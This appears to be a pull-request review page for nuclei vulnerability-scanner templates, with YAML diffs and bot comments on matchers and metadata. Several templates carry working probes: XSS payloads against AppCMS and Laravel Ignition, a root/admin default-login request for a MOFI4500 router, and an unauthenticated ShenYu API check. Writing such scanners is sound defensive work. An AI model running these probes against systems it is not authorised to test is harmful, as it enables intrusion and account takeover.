requests: requests:
- raw: - raw:

View File

@ -1,7 +1,7 @@
id: CVE-2021-40960 id: CVE-2021-40960
info: info:
name: Galera WebTemplate 1.0 Directory Traversal name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo author: daffainfo
severity: critical severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

View File

@ -0,0 +1,38 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
tags: cve,cve2021,appcms,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-45380
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '""></script><script>alert(document.domain)</script>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
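Review bot: the body matcher expects `""></script><script>alert(document.domain)</script>` with two leading double quotes, but the request sends only one (`%22%3e...`), so the match depends on the page emitting its own quote immediately before the reflected value; if that is intended, say so in a comment, otherwise drop one quote. `condition: and` on a matcher with a single word is a no-op and can go. In the description, "has a XSS" should read "has an XSS", and the path is better given with forward slashes (`/templates/m/inc_head.php`) to match the request path; backslashes in an unquoted YAML scalar are literal here, but the mixed style is confusing.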

View File

@ -4,7 +4,7 @@ info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS) name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat author: hexcat
severity: high severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218). description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference: reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/ - https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/ - https://wordpress.org/plugins/wp-html-mail/

View File

@ -0,0 +1,33 @@
id: CVE-2022-23944
info:
name: ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462/files
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
cve-id: CVE-2022-23944
cwe-id: CWE-862
tags: cve,cve2022,shenyu,unauth,apache
requests:
- method: GET
path:
- "{{BaseURL}}/plugin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"message":"query success"'
- '"code":200'
condition: and
- type: status
status:
- 200
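Review bot: the `classification:` block carries only `cve-id` and `cwe-id`; the other new CVE templates in this PR (CVE-2021-21973, CVE-2021-32682, CVE-2021-45380) also set `cvss-metrics` and `cvss-score`, and without them `severity: medium` has nothing to justify it against. Add the NVD vector. The matcher itself is sound: requiring both `"message":"query success"` and `"code":200` in a 200 response is more specific than either string alone.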

View File

@ -0,0 +1,33 @@
id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: critical
tags: mofi,default-login
requests:
- raw:
- |
POST /cgi-bin/luci/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=root&password=admin
attack: pitchfork
payloads:
username:
- root
password:
- admin
matchers-condition: and
matchers:
- type: word
words:
- "MOFI4500 - General - LuCI"
- type: status
status:
- 200
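Review bot: the `attack: pitchfork` block with `payloads` for `username` and `password` is never used, because the raw request body hardcodes `username=root&password=admin` instead of referencing `{{username}}` and `{{password}}`; either use the placeholders in the body or drop the payloads section, otherwise the template ships dead configuration. Also check that the raw request keeps an empty line between `Content-Type: application/x-www-form-urlencoded` and the body; as rendered here there is none, and without that separator the body is sent as a malformed header rather than as form data. Matching `MOFI4500 - General - LuCI` with HTTP 200 is a reasonable success signal; if the device returns a similar title on its login form, matching on a session cookie being set would make the default-credential finding harder to false-positive.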

View File

@ -0,0 +1,24 @@
id: netdata-dashboard-detect
info:
name: NetData Dashboard Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'Server: NetData Embedded HTTP Server'
tags: netdata,panel,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>netdata dashboard</title>'
- type: status
status:
- 200
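Review bot: `shodan-dork` under `metadata` is inconsistent with the `shodan-query` key used by the `typo3-detect` template in this same PR; use one key so tooling that reads template metadata finds it. The title match `<title>netdata dashboard</title>` is case-sensitive; `case-insensitive: true` (as the `typo3-detect` header matcher does) or a match on the `Server: NetData Embedded HTTP Server` header already named in the shodan query would be a sturdier fingerprint.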

View File

@ -0,0 +1,28 @@
id: openbmcs-detect
info:
name: openbmcs-detect
author: ffffffff0x
severity: info
tags: openbmcs,detect
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BMS - Login'
- 'Copyright all rights reserved by Open BMCS'
- 'OpenBMCS does not support Internet Explorer'
condition: or
- type: status
status:
- 200
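Review bot: `name: openbmcs-detect` just repeats the `id`; the other templates in this set use a human-readable name (e.g. `NetData Dashboard Detect`), so `OpenBMCS Detect` would be consistent. The tag `detect` is likewise unusual here; the other detection templates use `tech` (or `panel` for login pages, which the `BMS - Login` string suggests this is). A one-line `description` saying what OpenBMCS is would help whoever triages the finding.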

View File

@ -1,9 +1,10 @@
id: strapi-documentation id: strapi-documentation
info: info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) name: Strapi Documentation
author: idealphase author: idealphase
severity: info severity: info
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
tags: strapi,panel tags: strapi,panel
requests: requests:
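Review bot: the new `description` still carries the parenthetical remediation advice ("Make the documentation endpoint private. By default, the access is public"); stating what is exposed in the description and moving the advice to a `remediation` field reads better in reports. The rename to `Strapi Documentation` is fine, though `Strapi Documentation Plugin Exposure` would tell a reader what was found without opening the template.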

View File

@ -0,0 +1,26 @@
id: typo3-login
info:
name: TYPO3 Login Detect
author: dadevel
severity: info
tags: panel,typo3
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TYPO3 CMS"
- "typo3-login-form"
- "TYPO3 SVN ID:"
condition: or
- type: status
status:
- 200
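Review bot: with `condition: or`, the bare string `TYPO3 CMS` is enough to match on its own, and that text can appear in the title of any TYPO3 page, not only the backend login; since the request is already scoped to `/typo3/` this mostly works, but keeping `typo3-login-form` as the required string (or combining with `and`) ties the finding to an actual login form. Also check whether the `typo3-detect` template added in this same PR makes the `TYPO3 SVN ID:` string redundant here, so the two templates do not drift apart.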

View File

@ -1,7 +1,7 @@
id: honeywell-scada-config id: honeywell-scada-config
info: info:
name: Honeywell Scada System Information Disclosure name: Honeywell Scada System Information Disclosure
author: alperenkesk author: alperenkesk
severity: low severity: low
reference: https://www.exploit-db.com/exploits/44734 reference: https://www.exploit-db.com/exploits/44734

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff
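Review bot: two file diffs are suppressed on this page for size; those files get no review here and should be checked in the repository directly before merge, since a large template or index change is exactly where a stray matcher or broken YAML is easiest to miss.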

View File

@ -27,7 +27,7 @@ file:
- type: regex - type: regex
# Investigate for possible SQL Injection # Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id"); # Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array($user_id)); # Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
regex: regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace' - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
- type: regex - type: regex
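Review bot: the updated "Likely not Vulnerable" comment is now wrong: in PHP, single quotes do not interpolate, so `array('$user_id')` binds the literal string `$user_id` and the query never receives the user's id at all; the previous form `array($user_id)` was the correct parameterized call and should be restored. Separately, the regex `(?i)getone|getrow|getall|getcol|getassoc|execute|replace` has no word boundaries, so `replace` also matches `str_replace`, `preg_replace` and similar; `\b(getone|getrow|getall|getcol|getassoc|execute|replace)\s*\(` would cut that noise while keeping the ADOdb calls the comment describes.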

View File

@ -4,7 +4,7 @@ info:
name: JavaMelody Monitoring Exposed name: JavaMelody Monitoring Exposed
author: dhiyaneshDK,thomas_from_offensity author: dhiyaneshDK,thomas_from_offensity
severity: medium severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session. description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
reference: reference:
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security

View File

@ -4,7 +4,7 @@ info:
name: Prometheus targets API endpoint name: Prometheus targets API endpoint
author: geeknik author: geeknik
severity: info severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge. description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus tags: prometheus

View File

@ -4,7 +4,7 @@ info:
name: Detect Springboot Thread Dump page name: Detect Springboot Thread Dump page
author: philippedelteil author: philippedelteil
severity: low severity: low
description: The threaddump endpoint provides a thread dump from the applications JVM. description: The threaddump endpoint provides a thread dump from the application's JVM.
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
tags: springboot tags: springboot

View File

@ -15,6 +15,6 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- '<h1 class="headline">Uh oh. That page doesn\t exist.</h1>'
- 'This page is reserved for artistic dogs.' - 'This page is reserved for artistic dogs.'
- '<h1 class="headline">Uh oh. That page doesnt exist.</h1>'
condition: and condition: and
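Review bot: the replaced string changes `doesn\t` (a stray backslash) to `doesnt`, but the real page text most likely contains an apostrophe (`doesn't`), and `doesnt` will not match it. In a YAML single-quoted scalar an apostrophe is written as two single quotes, so the line should read `'<h1 class="headline">Uh oh. That page doesn''t exist.</h1>'` (or, if the page uses a typographic apostrophe, match on a substring that avoids it). Verify against a live response before merging: with `condition: and`, a wrong string makes the whole takeover check silently never fire.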

View File

@ -2,7 +2,7 @@ id: shopify-takeover
info: info:
name: shopify takeover detection name: shopify takeover detection
author: pdteam author: pdteam,philippedelteil
severity: high severity: high
tags: takeover tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -27,3 +27,5 @@ requests:
- type: dsl - type: dsl
dsl: dsl:
- '!contains(host,"myshopify.com")' - '!contains(host,"myshopify.com")'
- '!contains(host,"shopify.com")'
condition: and
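Review bot: the added `'!contains(host,"shopify.com")'` subsumes the existing `'!contains(host,"myshopify.com")'`, since any host containing `myshopify.com` also contains `shopify.com`; the first line is now redundant and can be dropped, which also removes the need for `condition: and`. The intent (do not flag Shopify's own hostnames as takeover candidates) is worth stating in a comment so the exclusion is not removed later.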

View File

@ -0,0 +1,30 @@
id: appcms-detect
info:
name: AppCms Detect
author: princechaddha
severity: info
tags: tech,appcms
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<!-- Powerd by AppCMS (.*) -->'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<!-- Powerd by AppCMS (.*) -->'
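Review bot: the regex `<!-- Powerd by AppCMS (.*) -->` spells "Powered" as "Powerd"; if the application really emits `Powerd by`, add a comment saying so, otherwise the matcher never fires. `(.*)` is also greedy and runs to the last `-->` on the line, so a version string followed by another HTML comment extracts wrongly; `(.*?)` or `([^>]*)` in both the matcher and the extractor keeps the capture to the version.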

View File

@ -2,10 +2,10 @@ id: jsf-detection
info: info:
name: JavaServer Faces Detection name: JavaServer Faces Detection
author: Moritz Nentwig author: brenocss,Moritz Nentwig
severity: info severity: info
description: Searches for JavaServer Faces content on a URL. description: Searches for JavaServer Faces content on a URL.
tags: jsf,tech tags: jsf,tech,primefaces,richfaces
requests: requests:
- method: GET - method: GET
@ -14,9 +14,23 @@ requests:
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers-condition: or
matchers: matchers:
- type: word - type: dsl
words: name: javafaces
- "javax.faces.resource" dsl:
- "javax.faces.ViewState" - "(contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState'))"
condition: or
- type: dsl
name: primefaces
dsl:
- "contains(body, 'primefaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
- type: dsl
name: richfaces
dsl:
- "contains(body, 'richfaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
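Review bot: the `javafaces` matcher has `condition: or` over a single DSL expression, which is a no-op because the OR is already inside the expression; drop it so it does not suggest a second entry. `contains()` is case-sensitive, so `contains(body, 'primefaces')` misses a page that only mentions `PrimeFaces` in mixed case; lower-casing the body first (e.g. `contains(tolower(body), 'primefaces')`) or matching a resource-library marker such as `ln=primefaces` is more reliable. Since `primefaces` and `richfaces` also require the generic JSF strings, a PrimeFaces page will report both the `javafaces` and `primefaces` matcher names under `matchers-condition: or`, which is presumably intended; a comment saying so helps the next reader.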

View File

@ -0,0 +1,35 @@
id: metatag-cms
info:
name: Metatag CMS Detection
author: dadevel
severity: info
description: Generic CMS Detection using html meta generator tag
reference: https://www.w3schools.com/tags/att_meta_name.asp
tags: tech,cms
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'text/html'
- type: regex
part: body
regex:
- '(?i)<meta\s+?name="?generator"?\s+?content="[^"]+?"'
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)<meta\s+?name="?generator"?\s+?content="([^"]+?)"'
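Review bot: the regex `<meta\s+?name="?generator"?\s+?content="[^"]+?"` requires `name` to precede `content` and requires double quotes around the value; `<meta content="WordPress 5.9" name="generator">` and `content='...'` are both valid HTML and would be missed. Allowing other attributes between them and either quote style, e.g. `(?i)<meta[^>]*name="?generator"?[^>]*content=["']([^"']+)["']`, widens coverage (keep to RE2 syntax, no backreferences, since nuclei uses Go regexp). The `+?` lazy quantifiers after `\s` gain nothing and can be plain `\s+`, and the extractor must be updated in step because it reuses the pattern with `group: 1`.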

View File

@ -0,0 +1,30 @@
id: typo3-detect
info:
name: TYPO3 Detection
author: dadevel
severity: info
metadata:
shodan-query: http.component:"TYPO3"
tags: tech,typo3
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: header
case-insensitive: true
words:
- 'X-TYPO3-Parsetime:'
- type: word
part: body
words:
- '<meta name="generator" content="TYPO3'
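Review bot: the body match `<meta name="generator" content="TYPO3` is an exact, case-sensitive prefix that assumes double quotes and `name` before `content`; the `metatag-cms` template added in this same PR already tolerates unquoted attributes with a regex, so a similar `(?i)<meta[^>]*name="?generator"?[^>]*content="?TYPO3` keeps the two consistent. The `X-TYPO3-Parsetime:` header check with `case-insensitive: true` is a good primary signal; with `redirects: true` and no status matcher it will also fire on the final page of a redirect chain, which is acceptable for a `tech` fingerprint but worth noting in a comment.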

View File

@ -0,0 +1,31 @@
id: laravel-ignition-xss
info:
name: Laravel Ignition XSS
author: 0x_Akoko
severity: medium
reference:
- https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
- https://github.com/facade/ignition/issues/273
tags: laravel,xss,ignition
requests:
- method: GET
path:
- "{{BaseURL}}/_ignition/scripts/--><svg%20onload=alert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Undefined index: --><svg onload=alert(document.domain)> in file"
- type: status
status:
- 500
- type: word
part: header
words:
- "text/html"
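Review bot: the match on `Undefined index: --><svg onload=alert(document.domain)> in file` with status 500 only fires when Ignition renders its debug error page, i.e. when the application runs with `APP_DEBUG` enabled, so the finding is as much "debug mode exposed" as reflected XSS; a `description` saying that, and a `remediation` pointing at disabling debug mode in production and updating the ignition package (the second reference tracks the fix), would make the result actionable. Adding a `classification` with `cwe-id: CWE-79`, as the new CVE templates in this PR do, keeps reporting consistent, and the exact wording `in file` is tied to one PHP/Ignition message format, so the matcher may need loosening for other versions.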

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200v1 Router Authentication Bypass name: NETGEAR DGN2200v1 Router Authentication Bypass
author: gy741 author: gy741
severity: high severity: high
description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif").
reference: reference:
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
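Review bot: while the quotes are being normalized, the sentence "however matches the entire URL" is missing its subject; "however the check matches the entire URL" makes the description read correctly. The rest of the wording, including the `(e.g., "?.gif")` example, is the clearest statement of the flaw and should stay.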

View File

@ -1,7 +1,7 @@
id: wordpress-affiliatewp-log id: wordpress-affiliatewp-log
info: info:
name: WordPress Plugin "AffiliateWP Allowed Products" Log Disclosure name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure
author: dhiyaneshDK author: dhiyaneshDK
severity: low severity: low
tags: wordpress,log,plugin tags: wordpress,log,plugin

View File

@ -1,7 +1,7 @@
id: wp-vault-local-file-inclusion id: wp-vault-local-file-inclusion
info: info:
name: WP Vault 0.8.6.6 Local File Inclusion name: WP Vault 0.8.6.6 Local File Inclusion
author: 0x_Akoko author: 0x_Akoko
severity: high severity: high
reference: https://www.exploit-db.com/exploits/40850 reference: https://www.exploit-db.com/exploits/40850